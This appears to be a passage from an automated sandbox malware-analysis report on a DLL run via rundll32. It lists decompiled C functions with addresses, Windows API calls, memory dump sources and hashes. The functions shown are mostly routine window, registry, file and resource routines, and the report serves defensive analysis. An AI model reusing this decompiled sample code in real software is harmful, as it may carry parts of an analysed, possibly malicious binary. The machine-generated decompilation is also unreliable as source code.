                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window
                                                                                                            • String ID:
                                                                                                            • API String ID: 2353593579-0
                                                                                                            • Opcode ID: f20903795edc35669258cf1f74e1e4e851f1226be1756a02d54bb3e882155ab8
                                                                                                            • Instruction ID: 59ebec99428bed81cbae9e399db4f0855efa5802a24bdab8832a78d2f0a6533d
                                                                                                            • Opcode Fuzzy Hash: f20903795edc35669258cf1f74e1e4e851f1226be1756a02d54bb3e882155ab8
                                                                                                            • Instruction Fuzzy Hash: FC01A93600151ABBDF13AFE1AC05EDF3B6AEF45391F814011FA1455062C736D971EBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10022422 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 95%
                                                                                                            			E10022422(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __ebp;
				struct HWND__* _t10;
				void* _t13;
				struct HWND__* _t15;
				struct HWND__* _t16;
				void* _t17;

				_t13 = __ecx;
				_t15 = GetDlgItem(_a4, _a8);
				if(_t15 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t16 = _t10;
						if(_t16 == 0) {
							goto L10;
						}
						_t10 = E10022422(_t13, _t16, _a8, _a12);
						if(_t10 == 0) {
							_t10 = GetWindow(_t16, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t15) == 0) {
						L3:
						_push(_t15);
						if(_a12 == 0) {
							return E100220EE(_t17);
						}
						_t10 = E10022115();
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E10022422(_t13, _t15, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}









                                                                                                            0x10022422
                                                                                                            0x10022439
                                                                                                            0x1002243d
                                                                                                            0x1002246d
                                                                                                            0x10022470
                                                                                                            0x1002248d
                                                                                                            0x1002248d
                                                                                                            0x10022491
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002247b
                                                                                                            0x10022482
                                                                                                            0x10022487
                                                                                                            0x00000000
                                                                                                            0x10022487
                                                                                                            0x00000000
                                                                                                            0x10022482
                                                                                                            0x1002243f
                                                                                                            0x10022444
                                                                                                            0x10022456
                                                                                                            0x1002245a
                                                                                                            0x1002245b
                                                                                                            0x00000000
                                                                                                            0x1002245d
                                                                                                            0x10022464
                                                                                                            0x1002246b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10022446
                                                                                                            0x1002244d
                                                                                                            0x10022454
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10022454
                                                                                                            0x10022444
                                                                                                            0x10022496
                                                                                                            0x10022496

                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32 ref: 1002242D
                                                                                                            • GetTopWindow.USER32(00000000), ref: 10022440
                                                                                                              • Part of subcall function 10022422: GetWindow.USER32(00000000,00000002), ref: 10022487
                                                                                                            • GetTopWindow.USER32(?), ref: 10022470
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Item
                                                                                                            • String ID:
                                                                                                            • API String ID: 369458955-0
                                                                                                            • Opcode ID: b9e1787de5e7a1ed3ad65300bc5edf47a0a497a9be77156916138b2de0f7076e
                                                                                                            • Instruction ID: cbb5f4ea75b5981124a7b3c1720515b8597a7f038d3602274fac482962cbe2a9
                                                                                                            • Opcode Fuzzy Hash: b9e1787de5e7a1ed3ad65300bc5edf47a0a497a9be77156916138b2de0f7076e
                                                                                                            • Instruction Fuzzy Hash: A701623650166BBBDB23BFE2BC00E9F3B99EF462E4F828121FD0499111D731D9629691
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002B47F Relevance: 6.0, APIs: 4, Instructions: 48registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002B47F(void* __ecx, void* __edi, void* __esi, CHAR* _a4, CHAR* _a8, char _a12) {
				intOrPtr _v8;
				char _v24;
				intOrPtr _t15;
				long _t22;
				void* _t31;
				void* _t32;

				_t15 =  *0x1004c470; // 0x6edecb8c
				_t31 = __ecx;
				_v8 = _t15;
				if( *((intOrPtr*)(__ecx + 0x50)) == 0) {
					wsprintfA( &_v24, 0x1003cc28, _a12);
					_t19 = WritePrivateProfileStringA(_a4, _a8,  &_v24,  *(_t31 + 0x64));
				} else {
					_t32 = E10035959(__ecx, _a4);
					if(_t32 != 0) {
						_t22 = RegSetValueExA(_t32, _a8, 0, 4,  &_a12, 4);
						RegCloseKey(_t32);
						_t19 = 0 | _t22 == 0x00000000;
					}
				}
				return E100117AE(_t19, _v8);
			}









                                                                                                            0x1002b485
                                                                                                            0x1002b48b
                                                                                                            0x1002b491
                                                                                                            0x1002b494
                                                                                                            0x1002b4d8
                                                                                                            0x1002b4ee
                                                                                                            0x1002b496
                                                                                                            0x1002b49e
                                                                                                            0x1002b4a2
                                                                                                            0x1002b4b3
                                                                                                            0x1002b4bc
                                                                                                            0x1002b4c6
                                                                                                            0x1002b4c9
                                                                                                            0x1002b4a2
                                                                                                            0x1002b4fe

                                                                                                            APIs
                                                                                                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 1002B4B3
                                                                                                            • RegCloseKey.ADVAPI32(00000000,?,?), ref: 1002B4BC
                                                                                                            • wsprintfA.USER32 ref: 1002B4D8
                                                                                                            • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002B4EE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClosePrivateProfileStringValueWritewsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 1902064621-0
                                                                                                            • Opcode ID: eeff4c081b5401d7091317d7c21aef54044c150afcc127b9d4d19e0a4f1937e9
                                                                                                            • Instruction ID: 9a6bc9ffc77bb201adb5d4a8a8e7071db867b7f7a5a0f8b8952f6efe61c2a51a
                                                                                                            • Opcode Fuzzy Hash: eeff4c081b5401d7091317d7c21aef54044c150afcc127b9d4d19e0a4f1937e9
                                                                                                            • Instruction Fuzzy Hash: A001403250161AEFDB02EFA5CD45E9E3BB8FF44754F044415FA04EB152DB71DA118B90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10031D85 Relevance: 6.0, APIs: 4, Instructions: 47fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10031D85(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a4) {
				intOrPtr _v8;
				char _v268;
				int _v272;
				void* __ebp;
				intOrPtr _t14;
				int _t24;
				intOrPtr* _t30;
				void* _t33;

				_t14 =  *0x1004c470; // 0x6edecb8c
				_v8 = _t14;
				E100220EE(_t33, SetActiveWindow( *(__ecx + 0x1c)));
				_t24 = 0;
				_v272 = DragQueryFileA(_a4, 0xffffffff, 0, 0);
				_t30 =  *((intOrPtr*)(E100373B5() + 4));
				if(_v272 > 0) {
					do {
						DragQueryFileA(_a4, _t24,  &_v268, 0x104);
						_t18 =  *((intOrPtr*)( *_t30 + 0x88))( &_v268);
						_t24 = _t24 + 1;
					} while (_t24 < _v272);
				}
				DragFinish(_a4);
				return E100117AE(_t18, _v8);
			}











                                                                                                            0x10031d8e
                                                                                                            0x10031d99
                                                                                                            0x10031da3
                                                                                                            0x10031dae
                                                                                                            0x10031db9
                                                                                                            0x10031dca
                                                                                                            0x10031dcd
                                                                                                            0x10031dcf
                                                                                                            0x10031ddf
                                                                                                            0x10031dec
                                                                                                            0x10031df2
                                                                                                            0x10031df3
                                                                                                            0x10031dcf
                                                                                                            0x10031dfe
                                                                                                            0x10031e10

                                                                                                            APIs
                                                                                                            • SetActiveWindow.USER32(?), ref: 10031D9C
                                                                                                            • DragQueryFileA.SHELL32(?,000000FF,00000000,00000000,00000000), ref: 10031DB7
                                                                                                            • DragQueryFileA.SHELL32(?,00000000,?,00000104), ref: 10031DDF
                                                                                                            • DragFinish.SHELL32(?), ref: 10031DFE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Drag$FileQuery$ActiveFinishWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 892977027-0
                                                                                                            • Opcode ID: bd7094511bd36670db2e3ffd89ec2879d875733b4acb4b41f2f8ac0a86cb3803
                                                                                                            • Instruction ID: f3efa9f330312ec6ab61e1b0fbe20e019f1dfd30d235b1af0ecd9192f479495c
                                                                                                            • Opcode Fuzzy Hash: bd7094511bd36670db2e3ffd89ec2879d875733b4acb4b41f2f8ac0a86cb3803
                                                                                                            • Instruction Fuzzy Hash: A2016975900228AFDB11DF64CC84DE97BB8EF49354F0081AAF5859B151CA70AE81CFA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100368F3 Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100368F3(void* __ecx, signed short _a4, signed short _a8, signed short _a12, signed short _a16) {
				signed short _t21;
				void* _t37;

				_t37 = __ecx;
				if(IsWindow( *(__ecx + 0x1c)) == 0) {
					 *(_t37 + 0xa8) = _a4;
					 *(_t37 + 0xac) = _a8;
					 *(_t37 + 0xa0) = _a12;
					_t21 = _a16;
					 *(_t37 + 0xa4) = _t21;
					return _t21;
				}
				SendMessageA( *(_t37 + 0x1c), 0x420, 0, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
				SendMessageA( *(_t37 + 0x1c), 0x41f, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff);
				return InvalidateRect( *(_t37 + 0x1c), 0, 1);
			}





                                                                                                            0x100368f7
                                                                                                            0x10036904
                                                                                                            0x10036954
                                                                                                            0x1003695d
                                                                                                            0x10036966
                                                                                                            0x1003696c
                                                                                                            0x1003696f
                                                                                                            0x00000000
                                                                                                            0x1003696f
                                                                                                            0x10036925
                                                                                                            0x1003693f
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • IsWindow.USER32(?), ref: 100368FC
                                                                                                            • SendMessageA.USER32(?,00000420,00000000,?), ref: 10036925
                                                                                                            • SendMessageA.USER32(?,0000041F,00000000,?), ref: 1003693F
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 10036948
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$InvalidateRectWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 3225880595-0
                                                                                                            • Opcode ID: 8d3f6a25381cc96bbc5022150596d566bf0059f3a53c98868d4427e143fea8c6
                                                                                                            • Instruction ID: 4b04fdd573aa0d80c43ff6d8227c2b4f41099026dca325be7ad292e47659670a
                                                                                                            • Opcode Fuzzy Hash: 8d3f6a25381cc96bbc5022150596d566bf0059f3a53c98868d4427e143fea8c6
                                                                                                            • Instruction Fuzzy Hash: 7E015E70200718AFE7218F19DC45FAABBF8EF45751F10842AFD95DA190D6B0F850DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10036FD8 Relevance: 6.0, APIs: 4, Instructions: 45memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 37%
                                                                                                            			E10036FD8(short* _a4) {
				char* _v0;
				int _v8;
				char* _v16;
				int _t6;
				char* _t7;
				short* _t11;
				void* _t12;
				void* _t16;
				int _t17;

				_t11 = _a4;
				if(_t11 != 0) {
					__imp__#7(_t11, _t12, _t16);
					_t17 = _t6;
					_t7 = WideCharToMultiByte(0, 0, _t11, _t17, 0, 0, 0, 0);
					_v0 = _t7;
					__imp__#150(0, _t7);
					_v16 = _t7;
					WideCharToMultiByte(0, 0, _t11, _t17, _t7, _v8, 0, 0);
					return _v16;
				}
				return 0;
			}












                                                                                                            0x10036fda
                                                                                                            0x10036fe3
                                                                                                            0x10036fec
                                                                                                            0x10036ffc
                                                                                                            0x10037002
                                                                                                            0x10037006
                                                                                                            0x1003700a
                                                                                                            0x10037016
                                                                                                            0x1003701f
                                                                                                            0x00000000
                                                                                                            0x10037026
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • SysStringLen.OLEAUT32(?), ref: 10036FEC
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,10039361,00000000), ref: 10037002
                                                                                                            • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1003700A
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,00000000,?,?,?,?,10039361,00000000), ref: 1003701F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Byte$CharMultiStringWide$Alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 3384502665-0
                                                                                                            • Opcode ID: c6caf2a32dfc1e22ea364bb6c40de8f05e5bfc3eeddc60a89b546b83931860c7
                                                                                                            • Instruction ID: 594c1e5c48785cf97723a890a7a01ae096917330bd715e74928d8e18aa0a9d1e
                                                                                                            • Opcode Fuzzy Hash: c6caf2a32dfc1e22ea364bb6c40de8f05e5bfc3eeddc60a89b546b83931860c7
                                                                                                            • Instruction Fuzzy Hash: 98F030721062387F92219B679C88CABBFDCFE8B2A5B014919F548C2101C2259901CBF1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10036B96 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10036B96(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v16;
				int _t12;
				signed int _t16;
				int _t18;
				intOrPtr _t19;
				void* _t24;
				intOrPtr* _t27;

				_t19 = _a4;
				_t27 = __ecx;
				E1002F372(__ecx, _t19, _a8);
				_t12 = E100202AB(__ecx);
				if((_t12 & 0x00000001) != 0) {
					_t12 = IsZoomed(GetParent( *(__ecx + 0x1c)));
					if(_t12 == 0) {
						 *((intOrPtr*)( *_t27 + 0x110))(0x407, 0,  &_v16, _t24);
						_t16 = GetSystemMetrics(5);
						_t18 = GetSystemMetrics(2);
						 *((intOrPtr*)(_t19 + 8)) =  *((intOrPtr*)(_t19 + 8)) - (_t16 << 1) - _v16 - _t18;
						return _t18;
					}
				}
				return _t12;
			}










                                                                                                            0x10036b9d
                                                                                                            0x10036ba4
                                                                                                            0x10036ba7
                                                                                                            0x10036bae
                                                                                                            0x10036bb6
                                                                                                            0x10036bc2
                                                                                                            0x10036bca
                                                                                                            0x10036bdc
                                                                                                            0x10036bea
                                                                                                            0x10036bf8
                                                                                                            0x10036bfc
                                                                                                            0x00000000
                                                                                                            0x10036bff
                                                                                                            0x10036bca
                                                                                                            0x10036c03

                                                                                                            APIs
                                                                                                              • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                                                            • GetParent.USER32(?), ref: 10036BBB
                                                                                                            • IsZoomed.USER32(00000000), ref: 10036BC2
                                                                                                            • GetSystemMetrics.USER32 ref: 10036BEA
                                                                                                            • GetSystemMetrics.USER32 ref: 10036BF8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MetricsSystem$LongParentWindowZoomed
                                                                                                            • String ID:
                                                                                                            • API String ID: 3909876373-0
                                                                                                            • Opcode ID: 68178c6c60ef6917867ce7114bcee81f5725171e5d46bf9d1dfeedfdf515f66b
                                                                                                            • Instruction ID: 7d4475de74911b0f59ada56c103e3f3b6aae8d9b3b29eeb5a8f877c48aa9be1b
                                                                                                            • Opcode Fuzzy Hash: 68178c6c60ef6917867ce7114bcee81f5725171e5d46bf9d1dfeedfdf515f66b
                                                                                                            • Instruction Fuzzy Hash: 3801A736A00214AFDB11ABB9DC49F59BBA8EF44740F018119FA45EB191D670B904CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000BFC5 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 54%
                                                                                                            			E1000BFC5(intOrPtr _a4, RECT* _a8, int _a12) {
				struct tagRECT _v20;
				intOrPtr _t28;

				_t28 = _a4;
				if(_a8 != 0) {
					IntersectRect( &_v20, _a8, _t28 - 0x9c);
					EqualRect( &_v20, _a8);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if(IsRectEmpty( &_v20) == 0) {
					InvalidateRect( *( *((intOrPtr*)( *((intOrPtr*)(_t28 - 0xac)) + 0x1c)) + 0x1c),  &_v20, _a12);
				}
				return 0;
			}





                                                                                                            0x1000bfd0
                                                                                                            0x1000bfd3
                                                                                                            0x1000bff6
                                                                                                            0x1000c003
                                                                                                            0x1000bfd5
                                                                                                            0x1000bfe0
                                                                                                            0x1000bfe1
                                                                                                            0x1000bfe2
                                                                                                            0x1000bfe3
                                                                                                            0x1000bfe5
                                                                                                            0x1000c015
                                                                                                            0x1000c02a
                                                                                                            0x1000c02a
                                                                                                            0x1000c034

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                                                            • String ID:
                                                                                                            • API String ID: 3354205298-0
                                                                                                            • Opcode ID: f3fc70dffe40ac54a64bc44e1e78ea87a7d0b2878780ef36980549cbbb75fdb9
                                                                                                            • Instruction ID: 1e794ae20577572ca79bd181089135021f598cd57710f0e7593056f93d140995
                                                                                                            • Opcode Fuzzy Hash: f3fc70dffe40ac54a64bc44e1e78ea87a7d0b2878780ef36980549cbbb75fdb9
                                                                                                            • Instruction Fuzzy Hash: 1601E57290022EEFEF01DFA5CC88EAAB7ADFB09254F018865E914DB115D231E5198B60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100214B2 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100214B2(struct HDC__* _a4, struct HWND__* _a8, intOrPtr _a12, void* _a16, long _a20) {
				long _v12;
				void _v16;
				intOrPtr _t12;
				long _t16;

				if(_a4 == 0 || _a16 == 0) {
					L10:
					return 0;
				} else {
					_t12 = _a12;
					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E10029A8E(_a8, _t12) == 0) {
						goto L10;
					} else {
						GetObjectA(_a16, 0xc,  &_v16);
						SetBkColor(_a4, _v12);
						_t16 = _a20;
						if(_t16 == 0xffffffff) {
							_t16 = GetSysColor(8);
						}
						SetTextColor(_a4, _t16);
						return 1;
					}
				}
			}







                                                                                                            0x100214bc
                                                                                                            0x10021521
                                                                                                            0x00000000
                                                                                                            0x100214c4
                                                                                                            0x100214c4
                                                                                                            0x100214ca
                                                                                                            0x00000000
                                                                                                            0x100214e7
                                                                                                            0x100214f0
                                                                                                            0x100214fc
                                                                                                            0x10021502
                                                                                                            0x10021508
                                                                                                            0x1002150c
                                                                                                            0x1002150c
                                                                                                            0x10021516
                                                                                                            0x00000000
                                                                                                            0x1002151e
                                                                                                            0x100214ca

                                                                                                            APIs
                                                                                                            • GetObjectA.GDI32(00000000,0000000C,?), ref: 100214F0
                                                                                                            • SetBkColor.GDI32(00000000,00000000), ref: 100214FC
                                                                                                            • GetSysColor.USER32(00000008), ref: 1002150C
                                                                                                            • SetTextColor.GDI32(00000000,?), ref: 10021516
                                                                                                              • Part of subcall function 10029A8E: GetWindowLongA.USER32 ref: 10029AA7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$LongObjectTextWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2871169696-0
                                                                                                            • Opcode ID: 270bb4ef9b18727549db2e87848aeeb4d20cea516dda6394fdb349df2a5cdfde
                                                                                                            • Instruction ID: 07a055e2fde14eb44e4b892d4051d3cd351fecf6f4b2367e44398545aae672e6
                                                                                                            • Opcode Fuzzy Hash: 270bb4ef9b18727549db2e87848aeeb4d20cea516dda6394fdb349df2a5cdfde
                                                                                                            • Instruction Fuzzy Hash: 0301283A900529EBEB429FA0EC85AEB3BA4EB55291F908560FD13C40A1C730CD90DB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002415A Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002415A(void* __ecx, CHAR* _a4) {
				void* __edi;
				struct HRSRC__* _t8;
				void* _t9;
				void* _t11;
				void* _t14;
				void* _t15;
				struct HINSTANCE__* _t16;
				void* _t17;

				_t14 = 0;
				_t11 = 0;
				_t17 = __ecx;
				if(_a4 == 0) {
					L4:
					_t15 = E100232BF(_t17, _t14, _t11);
					if(_t11 != 0 && _t14 != 0) {
						FreeResource(_t14);
					}
					return _t15;
				}
				_t16 =  *(E100373B5() + 0xc);
				_t8 = FindResourceA(_t16, _a4, 0xf0);
				if(_t8 == 0) {
					goto L4;
				}
				_t9 = LoadResource(_t16, _t8);
				_t14 = _t9;
				if(_t14 != 0) {
					_t11 = LockResource(_t14);
					goto L4;
				}
				return _t9;
			}











                                                                                                            0x1002415e
                                                                                                            0x10024160
                                                                                                            0x10024166
                                                                                                            0x10024168
                                                                                                            0x1002419d
                                                                                                            0x100241a7
                                                                                                            0x100241a9
                                                                                                            0x100241b0
                                                                                                            0x100241b0
                                                                                                            0x00000000
                                                                                                            0x100241b6
                                                                                                            0x1002416f
                                                                                                            0x1002417c
                                                                                                            0x10024184
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10024188
                                                                                                            0x1002418e
                                                                                                            0x10024192
                                                                                                            0x1002419b
                                                                                                            0x00000000
                                                                                                            0x1002419b
                                                                                                            0x100241bc

                                                                                                            APIs
                                                                                                            • FindResourceA.KERNEL32(?,?,000000F0), ref: 1002417C
                                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,?,?,1001EFB5,?,?,10006635), ref: 10024188
                                                                                                            • LockResource.KERNEL32(00000000,?,?,?,?,1001EFB5,?,?,10006635), ref: 10024195
                                                                                                            • FreeResource.KERNEL32(00000000,?,?,?,?,1001EFB5,?,?,10006635), ref: 100241B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
